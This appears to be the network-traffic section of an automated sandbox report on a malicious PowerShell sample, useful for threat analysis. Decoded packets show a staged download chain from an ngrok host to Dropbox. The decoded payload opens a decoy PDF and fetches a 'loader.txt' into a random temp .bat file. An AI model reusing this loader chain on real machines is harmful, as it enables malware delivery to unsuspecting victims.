                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.535389900 CET192.168.2.41.1.1.10x8a9Standard query (0)uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.710074902 CET192.168.2.41.1.1.10x86a2Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.710342884 CET192.168.2.41.1.1.10xafd5Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.344784021 CET192.168.2.41.1.1.10x80f9Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.344980001 CET192.168.2.41.1.1.10xfa26Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.345784903 CET192.168.2.41.1.1.10x39bfStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.346030951 CET192.168.2.41.1.1.10xf0f3Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.414722919 CET192.168.2.41.1.1.10x40faStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.415196896 CET192.168.2.41.1.1.10xcc99Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:38.959584951 CET192.168.2.41.1.1.10x766aStandard query (0)uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.378638983 CET192.168.2.41.1.1.10x77ebStandard query (0)uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.647444963 CET1.1.1.1192.168.2.40xd78No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app18.192.31.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.647444963 CET1.1.1.1192.168.2.40xd78No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.209.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.647444963 CET1.1.1.1192.168.2.40xd78No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app18.158.249.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.647444963 CET1.1.1.1192.168.2.40xd78No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.102.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.647444963 CET1.1.1.1192.168.2.40xd78No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.124.142.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.647444963 CET1.1.1.1192.168.2.40xd78No error (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app3.125.223.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.446985960 CET1.1.1.1192.168.2.40x8d19No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.446985960 CET1.1.1.1192.168.2.40x8d19No error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.432374954 CET1.1.1.1192.168.2.40x7667No error (0)uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.432374954 CET1.1.1.1192.168.2.40x7667No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:31.493679047 CET1.1.1.1192.168.2.40xe97fNo error (0)uc99c9846721962dead0990bdd22.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:31.493679047 CET1.1.1.1192.168.2.40xe97fNo error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.703061104 CET1.1.1.1192.168.2.40xf55cNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.703061104 CET1.1.1.1192.168.2.40xf55cNo error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.768965006 CET1.1.1.1192.168.2.40x8095No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.444860935 CET1.1.1.1192.168.2.40x77dfNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.549269915 CET1.1.1.1192.168.2.40x7ca4No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849838972 CET1.1.1.1192.168.2.40x86a2No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849838972 CET1.1.1.1192.168.2.40x86a2No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849864006 CET1.1.1.1192.168.2.40xa85No error (0)uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849864006 CET1.1.1.1192.168.2.40xa85No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.850136042 CET1.1.1.1192.168.2.40x1c07No error (0)uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.850136042 CET1.1.1.1192.168.2.40x1c07No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.858146906 CET1.1.1.1192.168.2.40x8a9No error (0)uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.943033934 CET1.1.1.1192.168.2.40xafd5No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481498957 CET1.1.1.1192.168.2.40x80f9No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481498957 CET1.1.1.1192.168.2.40x80f9No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481549025 CET1.1.1.1192.168.2.40xfa26No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481978893 CET1.1.1.1192.168.2.40x39bfNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481978893 CET1.1.1.1192.168.2.40x39bfNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.482808113 CET1.1.1.1192.168.2.40xf0f3No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.551862001 CET1.1.1.1192.168.2.40x40faNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.551862001 CET1.1.1.1192.168.2.40x40faNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.552150965 CET1.1.1.1192.168.2.40xcc99No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:38.705172062 CET1.1.1.1192.168.2.40x144eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:38.705172062 CET1.1.1.1192.168.2.40x144eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.292480946 CET1.1.1.1192.168.2.40x766aNo error (0)uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.292480946 CET1.1.1.1192.168.2.40x766aNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.720040083 CET1.1.1.1192.168.2.40x77ebNo error (0)uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.720040083 CET1.1.1.1192.168.2.40x77ebNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:32.469007015 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:32.469007015 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:33.463980913 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:33.463980913 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:34.475059032 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:34.475059032 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:36.490434885 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:36.490434885 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:40.492305994 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:40.492305994 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                  • 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                  • www.dropbox.com
                                                                                                                                                                                                                                                                                  • uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  • uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  • uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  • uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  • uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com

                                                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  0192.168.2.44973118.192.31.1654437148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:18 UTC230OUTGET /api/secure/3280fc306b2b1b17d755c31452bd62f7 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:20 UTC321INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 395
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:20 GMT
                                                                                                                                                                                                                                                                                  Location: https://www.dropbox.com/scl/fi/nslqaaaucex7u0dud265w/secure.txt?rlkey=3djwq7bnao7gleqen7lk4ym97&dl=1
                                                                                                                                                                                                                                                                                  Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:20 UTC395INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 73 68 6f 75 6c 64 20 62 65 20 72 65 64 69 72 65 63 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 74 6f 20 74 68 65 20 74 61 72 67 65 74 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 6e 73 6c 71 61 61 61 75 63 65 78 37 75 30 64 75 64 32 36 35 77 2f 73 65 63 75 72 65 2e 74 78 74 3f 72 6c 6b 65 79 3d 33 64 6a 77 71 37 62 6e 61 6f 37 67 6c 65 71 65 6e 37 6c 6b 34 79 6d 39 37 26 61 6d 70 3b
                                                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to the target URL: <a href="https://www.dropbox.com/scl/fi/nslqaaaucex7u0dud265w/secure.txt?rlkey=3djwq7bnao7gleqen7lk4ym97&amp;


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  1192.168.2.449732162.125.69.184437148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:21 UTC236OUTGET /scl/fi/nslqaaaucex7u0dud265w/secure.txt?rlkey=3djwq7bnao7gleqen7lk4ym97&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:23 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Security-Policy: media-src https://* blob: ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; font-src https://* data: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/cl [TRUNCATED]
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Location: https://uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com/cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mzsblpWfuZAJ1kVr8F5NLHVp5HdRP3LQxOuASaVpkKRl1J1qypCBfX8gbAMtbFBAbF7EmFE1r-hX1wxJZ97dDKiUG-5gUD_1lmXFajsI84SRn-GgCVXa-VdShugwxm/file?dl=1#
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                  Set-Cookie: gvc=MjY3MjM5ODE3MzExNTEzMjg3MzI0NTA0MDk0NTQzMjU5ODExOTU2; Path=/; Expires=Sun, 09 Dec 2029 17:41:22 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: t=KDWIb7VLXz0QvlmG-ihserir; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:22 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=KDWIb7VLXz0QvlmG-ihserir; Path=/; Expires=Wed, 10 Dec 2025 17:41:22 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=MZB264KDo8; Path=/; Expires=Wed, 10 Dec 2025 17:41:22 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:22 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:22 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: f7880decc3404c3aa254d933a253fb17
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:23 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  2192.168.2.449733162.125.69.154437148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:24 UTC370OUTGET /cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mzsblpWfuZAJ1kVr8F5NLHVp5HdRP3LQxOuASaVpkKRl1J1qypCBfX8gbAMtbFBAbF7EmFE1r-hX1wxJZ97dDKiUG-5gUD_1lmXFajsI84SRn-GgCVXa-VdShugwxm/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:25 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="secure.txt"; filename*=UTF-8''secure.txt
                                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  Etag: 1733749326451336d
                                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Server-Response-Time: 153
                                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:25 GMT
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                  Content-Length: 411
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 361449db4d9740ebae67cbceca5dd032
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:25 UTC411INData Raw: 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 6d 73 65 64 67 65 2e 65 78 65 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 2d 6b 69 6f 73 6b 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 73 69 72 67 72 68 35 77 63 6f 74 72 39 34 76 72 74 37 75 34 79 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 67 79 38 36 6c 6b 66 73 77 61 69 63 31 72 70 61 6e 67 6a 64 39 38 6b 39 6d 26 64 6c 3d 31 22 3b 20 24 52 61 6e 64 6f 6d 46 69 6c 65 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 62 61 74 22 3b 20 49 57 52 20 2d 55 72 69 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 61 6c 76 66
                                                                                                                                                                                                                                                                                  Data Ascii: Start-Process msedge.exe -ArgumentList "--kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1"; $RandomFileName = "$env:temp\$(Get-Random).bat"; IWR -Uri "https://www.dropbox.com/scl/fi/alvf


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  3192.168.2.449735162.125.69.184437148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:29 UTC212OUTGET /scl/fi/alvflaagbv3imslrlvn5w/loader.txt?rlkey=yc2jjmh5k3fj1en6bx0570rlg&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:30 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Security-Policy: img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ http [TRUNCATED]
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Location: https://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com/cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY2ykIWtYLGNsTT4GwJiMqVt-LQiQkC8J30YyTFZIyU46zoPfriT5Cou1PPRNnXmF1J6aYfMbdSYzAs0pdxsV-K3GvMKlGKRnKD6p-rdYVNvrnTb2JA6RtOIHYrfIc/file?dl=1#
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                  Set-Cookie: gvc=OTUxMjk2NDQwMDMzODU1MDEzOTgyNjgyMDg5OTIzODM5Mzg1NDc=; Path=/; Expires=Sun, 09 Dec 2029 17:41:30 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: t=B2sKJui6CwSTU3j_nc2iJGiM; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:30 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=B2sKJui6CwSTU3j_nc2iJGiM; Path=/; Expires=Wed, 10 Dec 2025 17:41:30 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=oeSiYBENqU; Path=/; Expires=Wed, 10 Dec 2025 17:41:30 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:30 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
